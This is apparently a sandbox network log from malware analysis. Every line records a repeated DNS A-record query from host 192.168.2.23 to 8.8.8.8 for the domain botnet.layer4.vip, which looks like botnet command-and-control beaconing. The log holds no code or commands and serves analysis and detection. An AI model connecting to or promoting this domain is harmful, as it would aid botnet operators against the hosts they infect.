                                  Apr 9, 2023 03:31:19.026771069 CEST192.168.2.238.8.8.80xd62bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:19.042731047 CEST192.168.2.238.8.8.80xd62bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:19.067310095 CEST192.168.2.238.8.8.80xd62bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:19.091706038 CEST192.168.2.238.8.8.80xd62bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:19.116559029 CEST192.168.2.238.8.8.80xfc1fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:19.132216930 CEST192.168.2.238.8.8.80xfc1fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:19.156539917 CEST192.168.2.238.8.8.80xfc1fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:19.181305885 CEST192.168.2.238.8.8.80xfc1fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:19.197447062 CEST192.168.2.238.8.8.80xfc1fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:19.221983910 CEST192.168.2.238.8.8.80x5d5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:19.238171101 CEST192.168.2.238.8.8.80x5d5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:19.254292011 CEST192.168.2.238.8.8.80x5d5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:19.279130936 CEST192.168.2.238.8.8.80x5d5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:19.303725004 CEST192.168.2.238.8.8.80x5d5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:19.328247070 CEST192.168.2.238.8.8.80xd63aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:19.344403028 CEST192.168.2.238.8.8.80xd63aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:19.360168934 CEST192.168.2.238.8.8.80xd63aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:19.384516001 CEST192.168.2.238.8.8.80xd63aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:19.400135994 CEST192.168.2.238.8.8.80xd63aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:19.415890932 CEST192.168.2.238.8.8.80x7245Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:19.440449953 CEST192.168.2.238.8.8.80x7245Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:19.465015888 CEST192.168.2.238.8.8.80x7245Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:19.489674091 CEST192.168.2.238.8.8.80x7245Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:19.513894081 CEST192.168.2.238.8.8.80x7245Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:19.538527012 CEST192.168.2.238.8.8.80x9578Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:19.563231945 CEST192.168.2.238.8.8.80x9578Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:19.578758001 CEST192.168.2.238.8.8.80x9578Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:19.603168964 CEST192.168.2.238.8.8.80x9578Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:19.619015932 CEST192.168.2.238.8.8.80x9578Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:19.634619951 CEST192.168.2.238.8.8.80xe26Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:19.650540113 CEST192.168.2.238.8.8.80xe26Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:19.666341066 CEST192.168.2.238.8.8.80xe26Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:19.690766096 CEST192.168.2.238.8.8.80xe26Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:19.715183973 CEST192.168.2.238.8.8.80xe26Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:19.730856895 CEST192.168.2.238.8.8.80x8435Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:19.755307913 CEST192.168.2.238.8.8.80x8435Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:19.779702902 CEST192.168.2.238.8.8.80x8435Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:19.795641899 CEST192.168.2.238.8.8.80x8435Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:19.811271906 CEST192.168.2.238.8.8.80x8435Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:19.835903883 CEST192.168.2.238.8.8.80x7b19Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:19.860106945 CEST192.168.2.238.8.8.80x7b19Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:19.884567976 CEST192.168.2.238.8.8.80x7b19Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:19.900116920 CEST192.168.2.238.8.8.80x7b19Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:19.924249887 CEST192.168.2.238.8.8.80x7b19Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:19.948980093 CEST192.168.2.238.8.8.80xbfddStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:19.973412991 CEST192.168.2.238.8.8.80xbfddStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:19.997512102 CEST192.168.2.238.8.8.80xbfddStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:20.025279045 CEST192.168.2.238.8.8.80xbfddStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:20.041399956 CEST192.168.2.238.8.8.80xbfddStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:20.057271957 CEST192.168.2.238.8.8.80xcad3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:20.081655979 CEST192.168.2.238.8.8.80xcad3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:20.105756998 CEST192.168.2.238.8.8.80xcad3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:20.121201992 CEST192.168.2.238.8.8.80xcad3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:20.136748075 CEST192.168.2.238.8.8.80xcad3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:20.152451038 CEST192.168.2.238.8.8.80xdcfaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:20.176419020 CEST192.168.2.238.8.8.80xdcfaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:20.200884104 CEST192.168.2.238.8.8.80xdcfaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:20.216456890 CEST192.168.2.238.8.8.80xdcfaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:20.231893063 CEST192.168.2.238.8.8.80xdcfaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:20.247401953 CEST192.168.2.238.8.8.80x4170Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:20.271486044 CEST192.168.2.238.8.8.80x4170Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:20.287096977 CEST192.168.2.238.8.8.80x4170Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:20.311480999 CEST192.168.2.238.8.8.80x4170Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:20.327358961 CEST192.168.2.238.8.8.80x4170Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:20.351579905 CEST192.168.2.238.8.8.80x8937Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:20.375724077 CEST192.168.2.238.8.8.80x8937Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:20.399851084 CEST192.168.2.238.8.8.80x8937Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:20.423937082 CEST192.168.2.238.8.8.80x8937Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:20.439439058 CEST192.168.2.238.8.8.80x8937Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:20.455357075 CEST192.168.2.238.8.8.80xd168Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:20.470921040 CEST192.168.2.238.8.8.80xd168Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:20.486751080 CEST192.168.2.238.8.8.80xd168Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:20.511123896 CEST192.168.2.238.8.8.80xd168Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:20.526660919 CEST192.168.2.238.8.8.80xd168Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:20.551183939 CEST192.168.2.238.8.8.80xb1dcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:20.575426102 CEST192.168.2.238.8.8.80xb1dcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:20.591207981 CEST192.168.2.238.8.8.80xb1dcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:20.606667995 CEST192.168.2.238.8.8.80xb1dcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:20.622401953 CEST192.168.2.238.8.8.80xb1dcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:20.646975994 CEST192.168.2.238.8.8.80xf3dbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:20.671561956 CEST192.168.2.238.8.8.80xf3dbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:20.687427044 CEST192.168.2.238.8.8.80xf3dbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:20.710711002 CEST192.168.2.238.8.8.80xf3dbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:20.726645947 CEST192.168.2.238.8.8.80xf3dbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:20.742659092 CEST192.168.2.238.8.8.80x6d70Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:20.758500099 CEST192.168.2.238.8.8.80x6d70Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:20.782577991 CEST192.168.2.238.8.8.80x6d70Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:20.806792974 CEST192.168.2.238.8.8.80x6d70Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:20.822359085 CEST192.168.2.238.8.8.80x6d70Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:20.846517086 CEST192.168.2.238.8.8.80xac3bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:20.870942116 CEST192.168.2.238.8.8.80xac3bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:20.895359993 CEST192.168.2.238.8.8.80xac3bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:20.919642925 CEST192.168.2.238.8.8.80xac3bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:20.944200039 CEST192.168.2.238.8.8.80xac3bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:20.959991932 CEST192.168.2.238.8.8.80xf348Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:20.984201908 CEST192.168.2.238.8.8.80xf348Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:21.000158072 CEST192.168.2.238.8.8.80xf348Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:21.024743080 CEST192.168.2.238.8.8.80xf348Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:21.049015999 CEST192.168.2.238.8.8.80xf348Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:21.073436022 CEST192.168.2.238.8.8.80x391Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:21.089339972 CEST192.168.2.238.8.8.80x391Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:21.113528013 CEST192.168.2.238.8.8.80x391Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:21.129530907 CEST192.168.2.238.8.8.80x391Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:21.153623104 CEST192.168.2.238.8.8.80x391Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:21.169722080 CEST192.168.2.238.8.8.80xc41aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:21.193897009 CEST192.168.2.238.8.8.80xc41aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:21.218352079 CEST192.168.2.238.8.8.80xc41aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:21.234225988 CEST192.168.2.238.8.8.80xc41aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:21.249919891 CEST192.168.2.238.8.8.80xc41aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:21.265829086 CEST192.168.2.238.8.8.80x70b6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:21.290054083 CEST192.168.2.238.8.8.80x70b6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:21.306003094 CEST192.168.2.238.8.8.80x70b6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:21.330243111 CEST192.168.2.238.8.8.80x70b6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:21.354744911 CEST192.168.2.238.8.8.80x70b6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:21.370466948 CEST192.168.2.238.8.8.80xc81cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:21.386163950 CEST192.168.2.238.8.8.80xc81cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:21.410727024 CEST192.168.2.238.8.8.80xc81cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:21.434983969 CEST192.168.2.238.8.8.80xc81cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:21.459439993 CEST192.168.2.238.8.8.80xc81cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:21.483787060 CEST192.168.2.238.8.8.80xdb1cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:21.507985115 CEST192.168.2.238.8.8.80xdb1cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:21.532186031 CEST192.168.2.238.8.8.80xdb1cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:21.556411028 CEST192.168.2.238.8.8.80xdb1cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:21.572032928 CEST192.168.2.238.8.8.80xdb1cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:21.596375942 CEST192.168.2.238.8.8.80x846dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:21.620683908 CEST192.168.2.238.8.8.80x846dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:21.645255089 CEST192.168.2.238.8.8.80x846dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:21.669920921 CEST192.168.2.238.8.8.80x846dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:21.694710970 CEST192.168.2.238.8.8.80x846dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:21.714838028 CEST192.168.2.238.8.8.80xc8cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:21.739032030 CEST192.168.2.238.8.8.80xc8cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:21.754664898 CEST192.168.2.238.8.8.80xc8cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:21.770720005 CEST192.168.2.238.8.8.80xc8cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:21.794847965 CEST192.168.2.238.8.8.80xc8cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:21.810749054 CEST192.168.2.238.8.8.80x1264Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:21.834820032 CEST192.168.2.238.8.8.80x1264Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:21.850534916 CEST192.168.2.238.8.8.80x1264Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:21.875000000 CEST192.168.2.238.8.8.80x1264Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:21.899162054 CEST192.168.2.238.8.8.80x1264Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:21.923713923 CEST192.168.2.238.8.8.80x98aeStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:21.939260006 CEST192.168.2.238.8.8.80x98aeStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:21.955094099 CEST192.168.2.238.8.8.80x98aeStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:21.970926046 CEST192.168.2.238.8.8.80x98aeStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:21.986458063 CEST192.168.2.238.8.8.80x98aeStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:22.010998964 CEST192.168.2.238.8.8.80x2c8aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:22.026438951 CEST192.168.2.238.8.8.80x2c8aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:22.050749063 CEST192.168.2.238.8.8.80x2c8aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:22.067094088 CEST192.168.2.238.8.8.80x2c8aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:22.091155052 CEST192.168.2.238.8.8.80x2c8aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:22.115201950 CEST192.168.2.238.8.8.80x2bbaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:22.139343023 CEST192.168.2.238.8.8.80x2bbaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:22.155222893 CEST192.168.2.238.8.8.80x2bbaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:22.171010017 CEST192.168.2.238.8.8.80x2bbaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:22.195348978 CEST192.168.2.238.8.8.80x2bbaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:22.219491959 CEST192.168.2.238.8.8.80x802fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:22.235357046 CEST192.168.2.238.8.8.80x802fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:22.259537935 CEST192.168.2.238.8.8.80x802fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:22.283654928 CEST192.168.2.238.8.8.80x802fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:22.307810068 CEST192.168.2.238.8.8.80x802fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:22.332329988 CEST192.168.2.238.8.8.80x3666Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:22.347757101 CEST192.168.2.238.8.8.80x3666Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:22.363172054 CEST192.168.2.238.8.8.80x3666Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:22.379077911 CEST192.168.2.238.8.8.80x3666Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:22.394638062 CEST192.168.2.238.8.8.80x3666Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:22.418869972 CEST192.168.2.238.8.8.80x39fcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:22.443465948 CEST192.168.2.238.8.8.80x39fcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:22.467952013 CEST192.168.2.238.8.8.80x39fcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:22.492397070 CEST192.168.2.238.8.8.80x39fcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:22.508044004 CEST192.168.2.238.8.8.80x39fcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:22.532560110 CEST192.168.2.238.8.8.80xc265Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:22.548353910 CEST192.168.2.238.8.8.80xc265Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:22.563944101 CEST192.168.2.238.8.8.80xc265Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:22.588402033 CEST192.168.2.238.8.8.80xc265Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:22.612795115 CEST192.168.2.238.8.8.80xc265Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:22.628405094 CEST192.168.2.238.8.8.80xcaa6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:22.644159079 CEST192.168.2.238.8.8.80xcaa6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:22.659631014 CEST192.168.2.238.8.8.80xcaa6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:22.684094906 CEST192.168.2.238.8.8.80xcaa6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:22.710386038 CEST192.168.2.238.8.8.80xcaa6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:22.735101938 CEST192.168.2.238.8.8.80xd5b9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:22.751009941 CEST192.168.2.238.8.8.80xd5b9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:22.775114059 CEST192.168.2.238.8.8.80xd5b9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:22.791017056 CEST192.168.2.238.8.8.80xd5b9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:22.806539059 CEST192.168.2.238.8.8.80xd5b9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:22.831046104 CEST192.168.2.238.8.8.80x9de1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:22.855180979 CEST192.168.2.238.8.8.80x9de1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:22.879626036 CEST192.168.2.238.8.8.80x9de1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:22.895319939 CEST192.168.2.238.8.8.80x9de1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:22.919703007 CEST192.168.2.238.8.8.80x9de1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:22.935214043 CEST192.168.2.238.8.8.80x7754Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:22.951129913 CEST192.168.2.238.8.8.80x7754Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:22.975225925 CEST192.168.2.238.8.8.80x7754Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:22.999360085 CEST192.168.2.238.8.8.80x7754Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.023425102 CEST192.168.2.238.8.8.80x7754Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.047537088 CEST192.168.2.238.8.8.80xd3ddStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.063388109 CEST192.168.2.238.8.8.80xd3ddStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.079287052 CEST192.168.2.238.8.8.80xd3ddStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
